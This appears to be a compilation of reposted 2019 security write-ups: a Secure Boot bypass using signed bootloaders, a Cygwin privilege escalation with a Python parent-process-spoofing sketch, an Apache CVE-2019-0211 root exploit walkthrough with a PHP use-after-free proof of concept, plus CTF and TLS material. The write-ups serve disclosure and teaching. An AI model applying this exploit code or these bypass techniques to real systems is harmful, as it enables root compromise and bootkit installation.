    char arr[] = { 26, 25, 11, 49, 6, 4, 24, 16, 10, 51, 25, 10, 51, 0, 10, 60, 25, 13, 6, 25, 60, 14, 16, 60, 16, 12, 50, 10, 20, 13, 6, 25, 60, 25, 6, 51, 4, 10, 51, 25, 14, 6, 49, 49, 30, 60, 23, 10, 49, 6, 25, 10, 9, 60, 25, 12, 60, 25, 13, 10, 60, 0, 13, 6, 49, 49, 10, 51, 4, 10, 2 };
    for (i = 0; i < 0x47; ++i) {
        arr[i] = (arr[i]^0x53)-3 ^ 0x33;
    }
}

Executing the above code yields the flag: utflag{sentence_that_is_somewhat_tangentially_related_to_the_challenge}

Source: https://x0r19x91.github.io/2019/utctf-mov
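As a quick cross-check of the recovered algorithm, here is the same transformation in Python (the byte array is copied verbatim from the listing above):

# Flag decoder recovered from the movfuscated binary: each byte is
# XORed with 0x53, decremented by 3, then XORed with 0x33.
arr = [26, 25, 11, 49, 6, 4, 24, 16, 10, 51, 25, 10, 51, 0, 10, 60,
       25, 13, 6, 25, 60, 14, 16, 60, 16, 12, 50, 10, 20, 13, 6, 25,
       60, 25, 6, 51, 4, 10, 51, 25, 14, 6, 49, 49, 30, 60, 23, 10,
       49, 6, 25, 10, 9, 60, 25, 12, 60, 25, 13, 10, 60, 0, 13, 6,
       49, 49, 10, 51, 4, 10, 2]

flag = "".join(chr((((b ^ 0x53) - 3) & 0xFF) ^ 0x33) for b in arr)
print(flag)  # utflag{sentence_that_is_somewhat_tangentially_related_to_the_challenge}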
  5. Exploiting signed bootloaders to circumvent UEFI Secure Boot

ValdikSS, April 1, 2019 at 01:24 PM. UEFI, Information Security. (A Russian version of this article is available.)

Modern PC motherboard firmware has followed the UEFI specification since 2010. In 2013, a new technology called Secure Boot appeared, intended to prevent bootkits from being installed and run. Secure Boot prevents the execution of unsigned or untrusted program code (.efi programs and operating system boot loaders, additional hardware firmware like video card and network adapter OPROMs). Secure Boot can be disabled on any retail motherboard, but a mandatory requirement for changing its state is the physical presence of the user at the computer. It is necessary to enter UEFI settings when the computer boots, and only then is it possible to change Secure Boot settings. Most motherboards include only Microsoft keys as trusted, which forces bootable software vendors to ask Microsoft to sign their bootloaders. This process includes a code audit procedure and justification for the need to sign the file with a globally trusted key if they want the disk or USB flash drive to work in Secure Boot mode without adding their key on each computer manually. Linux distributions, hypervisors, antivirus boot disks, and computer recovery software authors all have to get their bootloaders signed by Microsoft.

I wanted to make a bootable USB flash drive with various computer recovery software that would boot without disabling Secure Boot. Let's see how this can be achieved.

Signed bootloaders of bootloaders

So, to boot Linux with Secure Boot enabled, you need a signed bootloader. Microsoft forbids signing software licensed under GPLv3 because of the tivoization restriction in the license, therefore GRUB cannot be signed. To address this issue, the Linux Foundation released PreLoader and Matthew Garrett made shim—small bootloaders that verify the signature or hash of a single file and execute it. PreLoader and shim do not use the UEFI db certificate store, but contain a database of allowed hashes (PreLoader) or certificates (shim) inside the executable file. Both programs, in addition to automatically executing trusted files, allow you to run any previously untrusted programs in Secure Boot mode, but require the physical presence of the user. When executed for the first time, you need to select a certificate to be added or the file to be hashed in the graphical interface, after which the data is added into a special NVRAM variable on the motherboard which is not accessible from the loaded operating system. Files become trusted only for these pre-loaders, not for Secure Boot in general, and still couldn't be loaded without PreLoader or shim. [Figure: untrusted software's first boot with shim]

All modern popular Linux distributions use shim due to certificate support, which makes it easy to provide updates for the main bootloader without the need for user interaction. In general, shim is used to run GRUB2—the most popular bootloader in Linux.

GRUB2

To prevent signed bootloader abuse with malicious intentions, Red Hat created patches for GRUB2 that block "dangerous" functions when Secure Boot is enabled: insmod/rmmod, appleloader, linux (replaced by linuxefi), multiboot, xnu, memrw, iorw. The chainloader module, which loads arbitrary .efi files, introduced its own custom internal .efi (PE) loader without using the UEFI LoadImage/StartImage functions, as well as validation code for loaded files via shim, in order to preserve the ability to load files trusted by shim but not trusted in terms of UEFI. It's not exactly clear why this method is preferable—UEFI allows one to redefine (hook) the UEFI verification functions, which is how PreLoader works, and indeed the very same feature is present in shim but disabled by default.

Anyway, using the signed GRUB from some Linux distribution does not suit our needs. There are two ways to create a universal bootable flash drive that would not require adding the keys of each executable file to the trusted files:

1. Use a modded GRUB with an internal EFI loader, without digital signature verification or module restrictions;
2. Use a custom pre-loader (a second one) which hooks the UEFI file verification functions (EFI_SECURITY_ARCH_PROTOCOL.FileAuthenticationState, EFI_SECURITY2_ARCH_PROTOCOL.FileAuthentication)

The second method is preferable, as executed software can load and start other software; for example, a UEFI shell can execute any program. The first method does not provide this, allowing only GRUB to execute arbitrary files. Let's modify PreLoader by removing all unnecessary features and patching the verification code to allow everything. The disk architecture is as follows:

BOOTX64.efi (shim) → grubx64.efi (FileAuthentication override) → grubx64_real.efi (GRUB2), with MokManager.efi (the key-enrolling tool) launched by shim on first boot

This is how Super UEFIinSecureBoot Disk has been made. Super UEFIinSecureBoot Disk is a bootable image with the GRUB2 bootloader, designed to be used as a base for recovery USB flash drives. Key feature: the disk is fully functional with UEFI Secure Boot mode activated. It can launch any operating system or .efi file, even with an untrusted, invalid or missing signature. The disk can be used to run various Live Linux distributions, WinPE environments, and network boot, without disabling Secure Boot mode in UEFI settings, which can be convenient for performing maintenance on someone else's PC and on corporate laptops, for example, with UEFI settings locked with a password. The image contains 3 components: the shim pre-loader from Fedora (signed with the Microsoft key which is pre-installed in most motherboards and laptops), a modified Linux Foundation PreLoader (which disables digital signature verification of executed files), and a modified GRUB2 loader. On first boot it's necessary to select the certificate using MokManager (starts automatically); after that everything will work just as with Secure Boot disabled—GRUB loads any unsigned .efi file or Linux kernel, and executed EFI programs can load any other untrusted executables or drivers. To demonstrate the disk's functions, the image contains Super Grub Disk (a set of scripts to search for and execute an OS even if the bootloader is broken), GRUB Live ISO Multiboot (a set of scripts to load Linux Live distros directly from an ISO file), One File Linux (the kernel and initrd in a single file, for system recovery) and several UEFI utilities. The disk is also compatible with UEFI without Secure Boot, and with older PCs with BIOS.

Signed bootloaders

I was wondering: is it possible to bypass first-boot key enrollment through shim? Could there be signed bootloaders that allow you to do more than the authors expected? As it turned out—there are such loaders. One of them is used in Kaspersky Rescue Disk 18—an antivirus software boot disk. GRUB from the disk allows you to load modules (the insmod command), and a module in GRUB is just executable code. The pre-loader on the disk is a custom one. Of course, you can't just use GRUB from the disk to load untrusted code. It is necessary to modify the chainloader module so that GRUB does not use the UEFI LoadImage/StartImage functions, but instead loads the .efi file into memory itself, performs relocation, finds the entry point and jumps to it. Fortunately, almost all the necessary code is present in the Red Hat GRUB Secure Boot repository; the only problem is that the PE header parser is missing. GRUB gets the parsed header from shim, in response to a function call via a special protocol. This could be easily fixed by porting the appropriate code from shim or PreLoader to GRUB. This is how Silent UEFIinSecureBoot Disk has been made. The final disk architecture looks as follows:

BOOTX64.efi (Kaspersky Loader) → fde_ld.efi + custom chain.mod (Kaspersky GRUB2) → grubx64.efi (FileAuthentication override) → grubx64_real.efi (GRUB2)

The end

In this article we proved the existence of insufficiently reliable bootloaders signed with the Microsoft key, which allow booting untrusted code in Secure Boot mode. Using signed Kaspersky Rescue Disk files, we achieved silent booting of any untrusted .efi files with Secure Boot enabled, without the need to add a certificate to the UEFI db or shim MOK. These files can be used both for good deeds (for booting from USB flash drives) and for evil ones (for installing bootkits without the computer owner's consent). I assume that the Kaspersky bootloader signing certificate will not live long, and that it will be added to the global UEFI certificate revocation list, which will be installed on computers running Windows 10 via Windows Update, breaking Kaspersky Rescue Disk 18 and Silent UEFIinSecureBoot Disk. Let's see how soon this happens.

Super UEFIinSecureBoot Disk download: https://github.com/ValdikSS/Super-UEFIinSecureBoot-Disk

Silent UEFIinSecureBoot Disk download (ZeroNet Git Center network): http://127.0.0.1:43110/1KVD7PxZVke1iq4DKb4LNwuiHS4UzEAdAv/

Source: https://habr.com/en/post/446238/
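When testing such a disk, it helps to confirm what state the firmware is actually in. A minimal sketch in Python that reads the SecureBoot EFI variable via efivarfs on Linux (the GUID is the standard EFI global-variable GUID; the first four bytes of the file are the variable's attributes):

from pathlib import Path

# SecureBoot variable under efivarfs, EFI global-variable GUID
SECURE_BOOT_VAR = Path(
    "/sys/firmware/efi/efivars/"
    "SecureBoot-8be4df61-93ca-11d2-aa0d-00e098032b8c"
)

def secure_boot_enabled() -> bool:
    # Layout: 4 bytes of attributes, then the variable data;
    # for SecureBoot the data is a single byte, 1 = enabled.
    data = SECURE_BOOT_VAR.read_bytes()
    return data[4] == 1

if __name__ == "__main__":
    try:
        state = "enabled" if secure_boot_enabled() else "disabled"
        print(f"Secure Boot is {state}")
    except FileNotFoundError:
        print("Not booted via UEFI (or efivarfs not mounted)")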
  6. Exploiting a privileged zombie process handle leak on Cygwin

March 29th, 2019

Vulnerability

Two months ago, I was playing with Cygwin and I noticed, using Process Hacker, that all Cygwin processes inherited dead process handles. The bash.exe process spawned by the SSH daemon after a successful connection (1) runs with a newly created token as the limited test user. Indeed, Cygwin SSHD worked at the time with an administrator account (cyg_server), emulating set(e)uid by creating a new user token using the undocumented NtCreateToken. See the Cygwin documentation for more information about the change in version 3.0. The same bash.exe process inherits 3 handles to non-existent processes with full access rights (2). Tracing process creation and termination with Process Monitor during the SSH connection revealed that these leaked handles actually belong to privileged processes (3) that ran as cyg_server.

Exploitation

So what can we do with privileged zombie process handles? Since we have full access (PROCESS_ALL_ACCESS), we can try the following:

  • OpenProcessToken — FAIL: access denied
  • PROCESS_VM_OPERATION — FAIL: any VM operation will fail because the process no longer has an address space
  • PROCESS_CREATE_THREAD — FAIL: same problem; with no address space, creating a thread in the process will NOT work
  • PROCESS_DUP_HANDLE — FAIL: access denied on DuplicateHandle (not sure why :D)
  • PROCESS_CREATE_PROCESS — SUCCESS: Finally!

Let's see how to use this privilege. When creating a process, the attribute PROC_THREAD_ATTRIBUTE_PARENT_PROCESS in the STARTUPINFO structure allows the calling process to use a different process as the parent of the process being created. The calling process must have the PROCESS_CREATE_PROCESS access right on the process handle used as the parent. From the Windows documentation: "Attributes inherited from the specified process include handles, the device map, processor affinity, priority, quotas, the process token, and job object." So the spawned process will use the privileged token and thus run as cyg_server.

This exploitation technique is not new, and there may be other ways to exploit this case, but I wanted to show a real-world example of creating a process with a parent handle instead of just posting about it. I find it cleaner than injecting shellcode into a privileged process to spawn a process.

Exploit source

Fix

The vulnerability is now fixed with Cygwin version 3.0, thanks to the maintainers, who were very responsive.

  • Commit 1: Restricting permissions
  • Commit 2: Restricting permissions on exec
  • Commit 3: Removing the handle inheritance

Source: https://masthoon.github.io/exploit/2019/03/29/cygeop.html
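The parent-spoofing step can be sketched from Python with ctypes. This is a minimal illustration of the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS technique, not the author's exploit: it assumes you already hold a PROCESS_CREATE_PROCESS-capable handle (here obtained via OpenProcess on a hypothetical PID 1234; the real exploit uses the inherited leaked handle directly):

import ctypes
from ctypes import wintypes

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
kernel32.OpenProcess.restype = wintypes.HANDLE

PROCESS_CREATE_PROCESS = 0x0080
PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000
EXTENDED_STARTUPINFO_PRESENT = 0x00080000

class STARTUPINFO(ctypes.Structure):
    _fields_ = [
        ("cb", wintypes.DWORD), ("lpReserved", wintypes.LPWSTR),
        ("lpDesktop", wintypes.LPWSTR), ("lpTitle", wintypes.LPWSTR),
        ("dwX", wintypes.DWORD), ("dwY", wintypes.DWORD),
        ("dwXSize", wintypes.DWORD), ("dwYSize", wintypes.DWORD),
        ("dwXCountChars", wintypes.DWORD), ("dwYCountChars", wintypes.DWORD),
        ("dwFillAttribute", wintypes.DWORD), ("dwFlags", wintypes.DWORD),
        ("wShowWindow", wintypes.WORD), ("cbReserved2", wintypes.WORD),
        ("lpReserved2", ctypes.c_void_p), ("hStdInput", wintypes.HANDLE),
        ("hStdOutput", wintypes.HANDLE), ("hStdError", wintypes.HANDLE),
    ]

class STARTUPINFOEX(ctypes.Structure):
    _fields_ = [("StartupInfo", STARTUPINFO),
                ("lpAttributeList", ctypes.c_void_p)]

class PROCESS_INFORMATION(ctypes.Structure):
    _fields_ = [("hProcess", wintypes.HANDLE), ("hThread", wintypes.HANDLE),
                ("dwProcessId", wintypes.DWORD), ("dwThreadId", wintypes.DWORD)]

# Hypothetical: any handle with PROCESS_CREATE_PROCESS works here.
parent = kernel32.OpenProcess(PROCESS_CREATE_PROCESS, False, 1234)

# Build an attribute list holding the parent-process attribute.
size = ctypes.c_size_t(0)
kernel32.InitializeProcThreadAttributeList(None, 1, 0, ctypes.byref(size))
attr_list = ctypes.create_string_buffer(size.value)
kernel32.InitializeProcThreadAttributeList(attr_list, 1, 0, ctypes.byref(size))
hparent = wintypes.HANDLE(parent)
kernel32.UpdateProcThreadAttribute(
    attr_list, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
    ctypes.byref(hparent), ctypes.sizeof(hparent), None, None)

six = STARTUPINFOEX()
six.StartupInfo.cb = ctypes.sizeof(six)
six.lpAttributeList = ctypes.cast(attr_list, ctypes.c_void_p)
pi = PROCESS_INFORMATION()
cmdline = ctypes.create_unicode_buffer("cmd.exe")

# The child inherits the parent's token, so it runs as that user.
ok = kernel32.CreateProcessW(
    None, cmdline, None, None, False, EXTENDED_STARTUPINFO_PRESENT,
    None, None, ctypes.byref(six.StartupInfo), ctypes.byref(pi))
print("CreateProcessW ->", bool(ok))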
  7. Web Security Academy

Welcome to the Web Security Academy. This is a brand new learning resource providing free training on web security vulnerabilities, techniques for finding and exploiting bugs, and defensive measures for avoiding them. The Web Security Academy contains high-quality learning materials, interactive vulnerability labs, and video tutorials. You can learn at your own pace, wherever and whenever suits you. Best of all, everything is free! To access the vulnerability labs and track your progress, you'll just need to log in. Sign up if you don't have an account already. To get things started, we're covering four of the most serious "classic" vulnerabilities:

  • SQL injection
  • Cross-site scripting (XSS)
  • OS command injection
  • File path traversal (directory traversal)

Over the coming months, we'll be adding a series of further topics and a large number of new vulnerability labs. The team behind the Web Security Academy includes Dafydd Stuttard, author of The Web Application Hacker's Handbook.

Source: https://portswigger.net/web-security
  8. CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation

2019-04-03

Introduction

From version 2.4.17 (Oct 9, 2015) to version 2.4.38 (Apr 1, 2019), Apache HTTP suffers from a local root privilege escalation vulnerability due to an out-of-bounds array access leading to an arbitrary function call. The vulnerability is triggered when Apache gracefully restarts (apache2ctl graceful). In standard Linux configurations, the logrotate utility runs this command once a day, at 6:25AM, in order to reset log file handles. The vulnerability affects mod_prefork, mod_worker and mod_event. The following bug description, code walkthrough and exploit target mod_prefork.

Bug description

In MPM prefork, the main server process, running as root, manages a pool of single-threaded, low-privilege (www-data) worker processes, meant to handle HTTP requests. In order to get feedback from its workers, Apache maintains a shared-memory area (SHM), the scoreboard, which contains various information such as the workers' PIDs and the last request they handled. Each worker is meant to maintain a process_score structure associated with its PID, and has full read/write access to the SHM.

ap_scoreboard_image: pointers to the shared memory block

(gdb) p *ap_scoreboard_image
$3 = {
  global = 0x7f4a9323e008,
  parent = 0x7f4a9323e020,
  servers = 0x55835eddea78
}
(gdb) p ap_scoreboard_image->servers[0]
$5 = (worker_score *) 0x7f4a93240820

Example of shared memory associated with worker PID 19447

(gdb) p ap_scoreboard_image->parent[0]
$6 = {
  pid = 19447,
  generation = 0,
  quiescing = 0 '\000',
  not_accepting = 0 '\000',
  connections = 0,
  write_completion = 0,
  lingering_close = 0,
  keep_alive = 0,
  suspended = 0,
  bucket = 0 <- index for all_buckets
}
(gdb) ptype *ap_scoreboard_image->parent
type = struct process_score {
  pid_t pid;
  ap_generation_t generation;
  char quiescing;
  char not_accepting;
  apr_uint32_t connections;
  apr_uint32_t write_completion;
  apr_uint32_t lingering_close;
  apr_uint32_t keep_alive;
  apr_uint32_t suspended;
  int bucket; <- index for all_buckets
}

When Apache gracefully restarts, its main process kills old workers and replaces them with new ones. At this point, every old worker's bucket value will be used by the main process to index an array of its own, all_buckets.

all_buckets

(gdb) p $index = ap_scoreboard_image->parent[0]->bucket
(gdb) p all_buckets[$index]
$7 = {
  pod = 0x7f19db2c7408,
  listeners = 0x7f19db35e9d0,
  mutex = 0x7f19db2c7550
}
(gdb) ptype all_buckets[$index]
type = struct prefork_child_bucket {
  ap_pod_t *pod;
  ap_listen_rec *listeners;
  apr_proc_mutex_t *mutex; <--
}
(gdb) ptype apr_proc_mutex_t
apr_proc_mutex_t {
  apr_pool_t *pool;
  const apr_proc_mutex_unix_lock_methods_t *meth; <--
  int curr_locked;
  char *fname;
  ...
}
(gdb) ptype apr_proc_mutex_unix_lock_methods_t
apr_proc_mutex_unix_lock_methods_t {
  ...
  apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <--
  ...
}

No bounds checks happen. Therefore, a rogue worker can change its bucket index and make it point into the shared memory, in order to control the prefork_child_bucket structure upon restart. Eventually, and before privileges are dropped, mutex->meth->child_init() is called. This results in an arbitrary function call as root.

Vulnerable code

We'll go through server/mpm/prefork/prefork.c to find out where and how the bug happens. A rogue worker changes its bucket index in shared memory to make it point to a structure of its own, also in SHM. At 06:25AM the next day, logrotate requests a graceful restart from Apache.
Upon this, the main Apache process will first kill workers, and then spawn new ones. The killing is done by sending SIGUSR1 to workers. They are expected to exit ASAP. Then, prefork_run() (L853) is called to spawn new workers. Since retained->mpm->was_graceful is true (L861), workers are not restarted straight away. Instead, we enter the main loop (L933) and monitor dead workers' PIDs. When an old worker dies, ap_wait_or_timeout() returns its PID (L940). The index of the process_score structure associated with this PID is stored in child_slot (L948). If the death of this worker was not fatal (L969), make_child() is called with ap_get_scoreboard_process(child_slot)->bucket as the third argument (L985). As previously said, bucket's value has been changed by a rogue worker. make_child() creates a new child, fork()ing (L671) the main process. The OOB read happens (L691), and my_bucket is therefore under the control of an attacker. child_main() is called (L722), and the function call happens a bit further on (L433). SAFE_ACCEPT(<code>) will only execute <code> if Apache listens on two or more ports, which is often the case since a server listens over HTTP (80) and HTTPS (443). Assuming <code> is executed, apr_proc_mutex_child_init() is called, which results in a call to (*mutex)->meth->child_init(mutex, pool, fname) with mutex under control. Privileges are dropped a bit later in the execution (L446).

Exploitation

The exploitation is a four-step process:

1. Obtain R/W access on a worker process
2. Write a fake prefork_child_bucket structure in the SHM
3. Make all_buckets[bucket] point to the structure
4. Await 6:25AM to get an arbitrary function call

Advantages:
- The main process never exits, so we know where everything is mapped by reading /proc/self/maps (ASLR/PIE useless)
- When a worker dies (or segfaults), it is automatically restarted by the main process, so there is no risk of DOSing Apache

Problems:
- PHP does not allow reading/writing /proc/self/mem, which blocks us from simply editing the SHM
- all_buckets is reallocated after a graceful restart (!)

1. Obtain R/W access on a worker process

PHP UAF 0-day

Since mod_prefork is often used in combination with mod_php, it seems natural to exploit the vulnerability through PHP. CVE-2019-6977 would be a perfect candidate, but it was not out when I started writing the exploit. I went with a 0day UAF in PHP 7.x (which seems to work in PHP 5.x as well):

PHP UAF

<?php

class X extends DateInterval implements JsonSerializable
{
    public function jsonSerialize()
    {
        global $y, $p;
        unset($y[0]);
        $p = $this->y;
        return $this;
    }
}

function get_aslr()
{
    global $p, $y;
    $p = 0;
    $y = [new X('PT1S')];
    json_encode([1234 => &$y]);
    print("ADDRESS: 0x" . dechex($p) . "\n");
    return $p;
}

get_aslr();

This is a UAF on a PHP object: we unset $y[0] (an instance of X), but it is still usable via $this.

UAF to Read/Write

We want to achieve two things:
- Read memory to find all_buckets' address
- Edit the SHM to change a bucket index and add our custom mutex structure

Luckily for us, PHP's heap is located before those two in memory.
Memory addresses of PHP's heap, ap_scoreboard_image->* and all_buckets root@apaubuntu:~# cat /proc/6318/maps | grep libphp | grep rw-p 7f4a8f9f3000-7f4a8fa0a000 rw-p 00471000 08:02 542265 /usr/lib/apache2/modules/libphp7.2.so (gdb) p *ap_scoreboard_image $14 = { global = 0x7f4a9323e008, parent = 0x7f4a9323e020, servers = 0x55835eddea78 } (gdb) p all_buckets $15 = (prefork_child_bucket *) 0x7f4a9336b3f0 Since we're triggering the UAF on a PHP object, any property of this object will be UAF'd too; we can convert this zend_object UAF into a zend_string one. This is useful because of zend_string's structure: (gdb) ptype zend_string type = struct _zend_string { zend_refcounted_h gc; zend_ulong h; size_t len; char val[1]; } The len property contains the length of the string. By incrementing it, we can read and write further in memory, and therefore access the two memory regions we're interested in: the SHM and Apache's all_buckets. Locating bucket indexes and all_buckets We want to change ap_scoreboard_image->parent[worker_id]->bucket for a certain worker_id. Luckily, the structure always starts at the beginning of the shared memory block, so it is easy to locate. Shared memory location and targeted process_score structures root@apaubuntu:~# cat /proc/6318/maps | grep rw-s 7f4a9323e000-7f4a93252000 rw-s 00000000 00:05 57052 /dev/zero (deleted) (gdb) p &ap_scoreboard_image->parent[0] $18 = (process_score *) 0x7f4a9323e020 (gdb) p &ap_scoreboard_image->parent[1] $19 = (process_score *) 0x7f4a9323e044 To locate all_buckets, we can make use of our knowledge of the prefork_child_bucket structure. We have: Important structures of bucket items prefork_child_bucket { ap_pod_t *pod; ap_listen_rec *listeners; apr_proc_mutex_t *mutex; <-- } apr_proc_mutex_t { apr_pool_t *pool; const apr_proc_mutex_unix_lock_methods_t *meth; <-- int curr_locked; char *fname; ... } apr_proc_mutex_unix_lock_methods_t { unsigned int flags; apr_status_t (*create)(apr_proc_mutex_t *, const char *); apr_status_t (*acquire)(apr_proc_mutex_t *); apr_status_t (*tryacquire)(apr_proc_mutex_t *); apr_status_t (*release)(apr_proc_mutex_t *); apr_status_t (*cleanup)(void *); apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <-- apr_status_t (*perms_set)(apr_proc_mutex_t *, apr_fileperms_t, apr_uid_t, apr_gid_t); apr_lockmech_e mech; const char *name; } all_buckets[0]->mutex will be located in the same memory region as all_buckets[0]. Since meth is a static structure, it will be located in libapr's .data. Since meth points to functions defined in libapr, each of the function pointers will be located in libapr's .text. Since we have knowledge of those region's addresses through /proc/self/maps, we can go through every pointer in Apache's memory and find one that matches the structure. It will be all_buckets[0]. As I mentioned, all_buckets's address changes at every graceful restart. This means that when our exploit triggers, all_buckets's address will be different than the one we found. This has to be taken into account; we'll talk about this later. 2. 
Write a fake prefork_child_bucket structure in the SHM Reaching the function call The code path to the arbitrary function call is the following: bucket_id = ap_scoreboard_image->parent[id]->bucket my_bucket = all_buckets[bucket_id] mutex = &my_bucket->mutex apr_proc_mutex_child_init(mutex) (*mutex)->meth->child_init(mutex, pool, fname) Calling something proper To exploit, we make (*mutex)->meth->child_init point to zend_object_std_dtor(zend_object *object), which yields the following chain: mutex = &my_bucket->mutex [object = mutex] zend_object_std_dtor(object) ht = object->properties zend_array_destroy(ht) zend_hash_destroy(ht) val = &ht->arData[0]->val ht->pDestructor(val) pDestructor is set to system, and &ht->arData[0]->val is a string. As you can see, both leftmost structures are superimposed. 3. Make all_buckets[bucket] point to the structure Problem and solution Right now, if all_buckets' address was unchanged in between restarts, our exploit would be over: Get R/W over all memory after PHP's heap Find all_buckets by matching its structure Put our structure in the SHM Change one of the process_score.bucket in the SHM so that all_bucket[bucket]->mutex points to our payload As all_buckets' address changes, we can do two things to improve reliability: spray the SHM and use every process_score structure - one for each PID. Spraying the shared memory If all_buckets' new address is not far from the old one, my_bucket will point close to our structure. Therefore, instead of having our prefork_child_bucket structure at a precise point in the SHM, we can spray it all over unused parts of the SHM. The problem is that the structure is also used as a zend_object, and therefore it has a size of (5 * 8 😃 40 bytes to include zend_object.properties. Spraying a structure that big over a space this small won't help us much. To solve this problem, we superimpose the two center structures, apr_proc_mutex_t and zend_array, and spray their address in the rest of the shared memory. The impact will be that prefork_child_bucket.mutex and zend_object.properties point to the same address. Now, if all_bucket is relocated not too far from its original address, my_bucket will be in the sprayed area. Using every process_score Each Apache worker has an associated process_score structure, and with it a bucket index. Instead of changing one process_score.bucket value, we can change every one of them, so that they cover another part of memory. For instance: ap_scoreboard_image->parent[0]->bucket = -10000 -> 0x7faabbcc00 <= all_buckets <= 0x7faabbdd00 ap_scoreboard_image->parent[1]->bucket = -20000 -> 0x7faabbdd00 <= all_buckets <= 0x7faabbff00 ap_scoreboard_image->parent[2]->bucket = -30000 -> 0x7faabbff00 <= all_buckets <= 0x7faabc0000 This multiplies our success rate by the number of apache workers. Upon respawn, only one worker have a valid bucket number, but this is not a problem because the others will crash, and immediately respawn. Success rate Different Apache servers have different number of workers. Having more workers mean we can spray the address of our mutex over less memory, but it also means we can specify more index for all_buckets. This means that having more workers improves our success rate. After a few tries on my test Apache server of 4 workers (default), I had ~80% success rate. The success rate jumps to ~100% with more workers. Again, if the exploit fails, it can be restarted the next day as Apache will still restart properly. 
Apache's error.log will nevertheless contain notifications about its workers segfaulting. 4. Await 6:25AM for the exploit to trigger Well, that's the easy step. Vulnerability timeline 2019-02-22 Initial contact email to security[at]apache[dot]org, with description and POC 2019-02-25 Acknowledgment of the vulnerability, working on a fix 2019-03-07 Apache's security team sends a patch for I to review, CVE assigned 2019-03-10 I approve the patch 2019-04-01 Apache HTTP version 2.4.39 released Apache's team has been prompt to respond and patch, and nice as hell. Really good experience. PHP never answered regarding the UAF. Questions Why the name ? CARPE: stands for CVE-2019-0211 Apache Root Privilege Escalation DIEM: the exploit triggers once a day I had to. Can the exploit be improved ? Yes. For instance, my computations for the bucket indexes are shaky. This is between a POC and a proper exploit. BTW, I added tons of comments, it is meant to be educational as well. Does this vulnerability target PHP ? No. It targets the Apache HTTP server. Exploit The exploit will be disclosed at a later date. Sursa: https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html
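The region-hunting steps above lend themselves to a small helper. A minimal sketch in Python (not the author's exploit, which is written in PHP) that mirrors the grep commands from the writeup, listing the scoreboard SHM (rw-s) and writable libphp (rw-p) mappings of a worker, plus the bucket-index arithmetic under the assumption that prefork_child_bucket is three 8-byte pointers (24 bytes) on x86-64:

def mappings(pid, perms, substr=""):
    # Parse /proc/<pid>/maps and yield (start, end, path) for regions
    # whose permission string matches and whose line contains substr.
    with open(f"/proc/{pid}/maps") as f:
        for line in f:
            fields = line.split()
            if fields[1] == perms and substr in line:
                start, end = (int(x, 16) for x in fields[0].split("-"))
                yield start, end, fields[-1]

BUCKET_SIZE = 3 * 8  # sizeof(prefork_child_bucket): three pointers

def bucket_index(all_buckets, target):
    # Index such that all_buckets[index] overlaps `target`; negative
    # when the SHM lies below all_buckets, as in the writeup.
    return (target - all_buckets) // BUCKET_SIZE

if __name__ == "__main__":
    import sys
    pid = int(sys.argv[1])
    print(list(mappings(pid, "rw-s")))            # scoreboard SHM
    print(list(mappings(pid, "rw-p", "libphp")))  # PHP heap region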
  9. TLS Security 1: What Is SSL/TLS Posted on April 3, 2019 by Agathoklis Prodromou Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are cryptographic security protocols. They are used to make sure that network communication is secure. Their main goals are to provide data integrity and communication privacy. The SSL protocol was the first protocol designed for this purpose and TLS is its successor. SSL is now considered obsolete and insecure (even its latest version), so modern browsers such as Chrome or Firefox use TLS instead. SSL and TLS are commonly used by web browsers to protect connections between web applications and web servers. Many other TCP-based protocols use TLS/SSL as well, including email (SMTP/POP3), instant messaging (XMPP), FTP, VoIP, VPN, and others. Typically, when a service uses a secure connection the letter S is appended to the protocol name, for example, HTTPS, SMTPS, FTPS, SIPS. In most cases, SSL/TLS implementations are based on the OpenSSL library. SSL and TLS are frameworks that use a lot of different cryptographic algorithms, for example, RSA and various Diffie–Hellman algorithms. The parties agree on which algorithm to use during initial communication. The latest TLS version (TLS 1.3) is specified in the IETF (Internet Engineering Task Force) document RFC 8446 and the latest SSL version (SSL 3.0) is specified in the IETF document RFC 6101. Privacy & Integrity SSL/TLS protocols allow the connection between two mediums (client-server) to be encrypted. Encryption lets you make sure that no third party is able to read the data or tamper with it. Unencrypted communication can expose sensitive data such as user names, passwords, credit card numbers, and more. If we use an unencrypted connection and a third party intercepts our connection with the server, they can see all information exchanged in plain text. For example, if we access the website administration panel without SSL, and an attacker is sniffing local network traffic, they see the following information. The cookie that we use to authenticate on our website is sent in plain text and anyone who intercepts the connection can see it. The attacker can use this information to log into our website administration panel. From then on, the attacker’s options expand dramatically. However, if we access our website using SSL/TLS, the attacker who is sniffing traffic sees something quite different. In this case, the information is useless to the attacker. Identification SSL/TLS protocols use public-key cryptography. Except for encryption, this technology is also used to authenticate communicating parties. This means, that one or both parties know exactly who they are communicating with. This is crucial for such applications as online transactions because must be sure that we are transferring money to the person or company who are who they claim to be. When a secure connection is established, the server sends its SSL/TSL certificate to the client. The certificate is then checked by the client against a trusted Certificate Authority, validating the server’s identity. Such a certificate cannot be falsified, so the client may be one hundred percent sure that they are communicating with the right server. Perfect Forward Secrecy Perfect forward secrecy (PFS) is a mechanism that is used to protect the client if the private key of the server is compromised. Thanks to PFS, the attacker is not able to decrypt any previous TLS communications. To ensure perfect forward secrecy, we use new keys for every session. 
TLS Security 2: Learn about the history of SSL/TLS and protocol versions: SSL 2.0, SSL 3.0, TLS 1.0, TLS 1.1, and TLS 1.2.
TLS Security 3: Learn about SSL/TLS terminology and basics, for example, encryption algorithms, cipher suites, message authentication, and more.
TLS Security 4: Learn about SSL/TLS certificates, certificate authorities, and how to generate certificates.
TLS Security 5: Learn how a TLS connection is established, including key exchange, TLS handshakes, and more.
TLS Security 6: Learn about TLS vulnerabilities and attacks such as POODLE, BEAST, CRIME, BREACH, and Heartbleed.

Agathoklis Prodromou
Web Systems Administrator/Developer

Akis has worked in the IT sphere for more than 13 years, developing his skills from a defensive perspective as a System Administrator and Web Developer, but also from an offensive perspective as a penetration tester. He holds various professional certifications related to ethical hacking, digital forensics and incident response.

Sursa: https://www.acunetix.com/blog/articles/tls-security-what-is-tls-ssl-part-1/
